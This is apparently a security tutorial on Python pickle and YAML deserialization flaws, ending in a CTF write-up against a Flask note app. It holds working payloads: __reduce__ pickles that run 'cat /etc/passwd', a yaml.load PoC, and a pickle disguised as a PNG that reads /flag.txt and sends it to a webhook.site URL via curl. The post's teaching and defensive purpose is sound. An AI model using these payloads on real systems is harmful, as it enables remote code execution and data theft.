Python Serialization Vulnerabilities - Pickle

Serialization gathers up the data from objects and converts them to a string of bytes, and writes to disk. The data can be deserialized and the original objects can be recreated. Many programming languages offer a way to do this including PHP, Java, Ruby and Python (common backend coding languages in web).

Let's talk about serialization in Python. In Python, when we use pickle module, the serialization is called pickling.

eg: here is an array, pickled

>>> import pickle
>>> foo = pickle.dumps([1,2,3])
>>> print(foo)
b'\x80\x04\x95\x0b\x00\x00\x00\x00\x00\x00\x00]\x94(K\x01K\x02K\x03e.'
>>> pickle.loads(foo)
[1, 2, 3]
>>>

As we can see above, when we print the variable foo, we see a byte string. This is serialization. Later, with pickle.loads(foo) we are deserializing the object.

This is helpful in many cases, including when I want to save some variable from a program on the drive as a binary which can be later used in other programs. Eg:

As we can see, a pickle binary is now stored on the drive. Let's read it using pickle again.

As you can see, we can now operate on this deserialized object (new_object) just like an array again!

Throughout the SDLC, there may come a time where a developer would want to quit the IDE but wants to save all the data and states of variables at the moment, that is where this is a helpful feature.

Serialization in Web Apps

Okay, so we have talked about serialization in software applications. But what is the use of serialization in web apps? So, the HTTP is a stateless protocol. That is the state of one request doesn't depend on the previous request. But sometimes there is a need to maintain state. That's why we have cookies. Cookies would bring a sense of statefulness in HTTP protocol.

If we want a user's information and some data to be retained next time they interact with the server, serialization is a wonderful use case. Just serialize some data, put it into a cookie (which btw, is taking up user's storage and not server's! WoW) and next request just dedserialize it and use it on the site.

Pickle is used in python web apps to do this. But one caveat is that it deserializes unsafely and it's content is controlled by the client. Just fyi, serialization in json is much safer! Unlike some other serialization formats, JSON doesn't allow executable code to be embedded within the data. This eliminates the risk of code injection vulnerabilities that can be exploited by malicious actors.

It is possible to construct malicious pickle data which will execute arbitrary code!

Over Pickling

We have talked about pickling well known data types like an array. But what if I were to pickle my own custom classes? Python can easily understand and deserialize well known classes but what will it do with custom classes like connection to servers and all those fancy networking scripts? it doesn't even make sense to serialize those but Python developers added a way to pickle that too. There is a chance that discrepancies might happen when python tries to dedserialize such objects.

Custom pickling and unpickling code can be used. When you define a class you can provide a mechanism that states, 'here is what you should do when someone asks to unpickle you!' So when python goes to unpickle this string of bytes, it might have to run some code to figure out how to properly reconstruct that object. This code will be embedded in this pickle file.

Let's see a small example

Here is a code for proof of concept. This code is creating a class called EvilPickle. To implement support for pickling on your custom object, you define a method called "_ _reduce_ _" which returns a function and pair of arguments to call that function with. Here, a simple "cat /etc/passwd" would be run using os.system function. Finally this would be written in a binary file called backup.data.

import pickle
import os
class EvilPickle(object):
  def __reduce__(self):
    return (os.system, ('cat /etc/passwd', ))
pickle_data = pickle.dumps(EvilPickle())
with open("backup.data", "wb") as file:
  file.write(pickle_data)

The idea here is to make the deserializer run cat /etc/passwd on their system.

Let's try it out now!

We save the above code in evilpickle.py file and run it. Just to check, we'll cat the backup.data file. Here we can clearly see something fishy!

The user deserializes it anyway and ends up giving out /etc/passwd file.

import pickle
pickle.loads(open("backup.data","rb").read())

We can get even more nerdy and see what is happening under the hood by disasseembling using pickletools. Here, the pickling is done on unix like os (posix) which is stored in a SHORT variable and stored in as 0 and each successive command after that in different numeric values on the stack. The REDUCE opcode is used to call a callable (typically a Python function or method, here os.system (represented as posix and system)) with arguments (called TUPLE. here, cat /etc/passwd). And finally, the program is stopped.

The primary difference between tuples and lists is that tuples are immutable as opposed to lists which are mutable. Therefore, it is possible to change a list but not a tuple. The contents of a tuple cannot change once they have been created in Python due to the immutability of tuples.

python3 -m pickletools -a backup.data

note: -a options gives some info about each steps while using pickletools

So since the pickle object is user controlled and it unpickles at server, we can even use this to get remote server shell as well (using sockets and pickling it and finally providing it to the server)

PyTorch ML model up until recent times used pickle for serialization of ML models and was vulnerable to arbitrary code execution. (https://github.com/pytorch/pytorch/issues/52596) Safetensors overcame this issue.

Is Python YAML better?

Python YAML is another serialization format instead of pickle. But even Python YAML allows execution of arbitrary code by default. here is another POC:

import yaml
document = "!!python/object/apply:os.system ['cat /etc/passwd']"
yaml.load(document)

This would also execute cat /etc/passwd. We can avoid this using "safe_load()" instead of load anyway ;)

WHAT IS SAFE THEN?

Alternates to pickle are:

  1. JSON

import json

# Serialize
data = {"key": "value"}
json_data = json.dumps(data)

# Deserialize
deserialized_data = json.loads(json_data)
  1. msgpack

import msgpack

# Serialize
data = {"key": "value"}
msgpack_data = msgpack.packb(data)

# Deserialize
deserialized_data = msgpack.unpackb(msgpack_data, raw=False)

Others: protobuf by google, CBOR

Small CTF on Pickling

Okay. So the given website is a note taking website which is using serialization. Here is what happens when I submit a note with a PNG image.

This looks something like this when processed by the server. Observe the URL which is rendering a .pickle file

The challenge also provided us with an app.py source code which tells us all about the background logic.

#!/usr/bin/env python3

from flask import Flask, render_template, send_from_directory, request, redirect
from werkzeug import secure_filename

import pickle
import os

NOTE_FOLDER='notes/'


class Note(object):
    def __init__(self, title, content, image_filename):
        self.title=title
        self.content=content
        self.image_filename=secure_filename(image_filename)
        self.internal_title=secure_filename(title)


def save_note(note, image):
    note_file=open(NOTE_FOLDER + secure_filename(note.title + '.pickle'), 'wb')
    note_file.write(pickle.dumps(note))
    note_file.close()

    image.save(NOTE_FOLDER + note.image_filename)


def unpickle_file(file_name):
    note_file=open(NOTE_FOLDER + file_name, 'rb')
    return pickle.loads(note_file.read())


def load_all_notes():
    notes=[]
    for filename in os.listdir(NOTE_FOLDER):
        if filename.endswith('.pickle'):
            notes.append(unpickle_file(filename))
    return notes


app=Flask(__name__)


@app.route('/')
def index():
    return render_template('index.html', notes=load_all_notes())


@app.route('/notes/<file_name>')
def notes(file_name):
    if request.args.get('view', default=False):
        note=unpickle_file(file_name)
        return render_template('view.html', note=note)
    else:
        return send_from_directory(NOTE_FOLDER, file_name)


@app.route('/new', methods=['GET', 'POST'])
def note_new():
    if request.method == "POST":
        image=request.files.get('image')
        if not image.filename.endswith('.png'):
            return 'nah bro png images only!', 403
        new_note=Note(
            request.form.get('title'),
            request.form.get('content'),
            image_filename=image.filename
        )
        save_note(new_note, image)
        return redirect('/notes/' + new_note.internal_title + '.pickle' + '?view=true')
    return render_template('new.html')


if __name__ == "__main__":
    app.run(
        host='0.0.0.0',
        port=5000
    )

As we can see, the code is accepting title, content and image as an object, pickling it and storing it in title.pickle

Here are the key functions of the code:

  1. Note() class accepts an object new_note with 3 items: title, content, image_filename.

  2. save_note() is calling pickle.dumps() to pickle new_note. save_note() is also called to store image using image.save which is a flask function. similarly image.filename extracts image's filename.

  3. secure_filename() function converts insecure names to secure ones. For example: note 1 becomes note_1, ../../../etc/passwd becomes etc_passwd

  4. unpickle_file is loading the pickled file provided to it and unpickles it.

Here are some key takeaways about the functionality of the code:

  1. Site is accepting 3 key items.

  2. It is not cheecking is PNG is safe or not (as in if it is a valid PNG or not. This is a good attack point)

  3. We can send pickled code in png and access it by it's filename since notes() function allows any file to be viewed. We just have to remember the file name of the PNG we provide. See below, we just need to provide /notes/filename.png and the site will unpickle it! @app.route('/notes/<file_name>')

    def notes(file_name):
        if request.args.get('view', default=False):
            note=unpickle_file(file_name)
  4. All in all, PNG file upload is a really strong contender to put code in because: a, site isn't validating safety of PNG and b, it will unpickle any file we provide

So, it was settled. I'd pickle a simple bash command and put it in a png file. Then access it with view GET parameter so the site unpickles it.

I tried with a simple whoami command on my local machine and the evil.png pickled file was deserializing properly!

Let's take it a step further and use webhook.site to receive data from deserialized local execution of evil.png and have it execute whoami. I used a simple CURL command and extracted files using GET parameter since the site was still providing unpickled output as PNG file. But since it was deserializing it, I could receive the data elsewhere (for eg: an endpoint I control on webhook)

i=$(whoami); curl "https://webhook.site/?whoami=$i"

Once I submit the new evil.png and access it, I see a new connection on webhook.

As we can see, the deserialization has worked, command executed and we receive whoami's answer! Let's try this on the website.

site.com/notes/evil.png?view=true

On webhook I see this

On webhook, I receive a new connection and answer! This proves we have arbitrary code execution on the server! What's more, it is running as root already as you can see below. No privilege escalation required, we can read any sensitive files through this.

Let's craft a command which reads /flag.txt off the server.

i=$(cat /flag.txt); curl "https://webhook.site/5ff7d8e6-7b4c-499b-9663-90380e051c03?id=$i

Now, curl is tricky and it will throw "curl: (3) URL using bad/illegal format or missing URL" error if illegal URL characters like []{}() are encountered. So I had to be crafty and use a python command inside the subshell (the $() in the bash command)

i=$(cat /flag.txt); i=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$i'))"); curl "https://webhook.site/5ff7d8e6-7b4c-499b-9663-90380e051c03?id=$i"

Final python code looked like this.

import pickle
import os
class EvilPickle(object):
  def __reduce__(self):
    return (os.system, ('i=$(cat /flag.txt); i=$(python3 -c "import urllib.parse; print(urllib.parse.quote(\'$i\'))"); curl "https://webhook.site/5ff7d8e6-7b4c-499b-9663-90380e051c03?id=$i"', ))
pickle_data = pickle.dumps(EvilPickle())
with open("evil.png", "wb") as file:
  file.write(pickle_data)

When I executed this locally, I could see the contents of /flag.txt I crafted in local system!

Then I uploaded this file on the server

Then I accessed the PNG file

Finally, when I looked at the webhook, I saw a new connection with the intended data I wanted of the server's flag.txt file!

This is how an attacker would exploit this serialization vulnerability in pickle module in Python.

I blurred out the PIIs and CTF site details so that no cheating is possible.

Last updated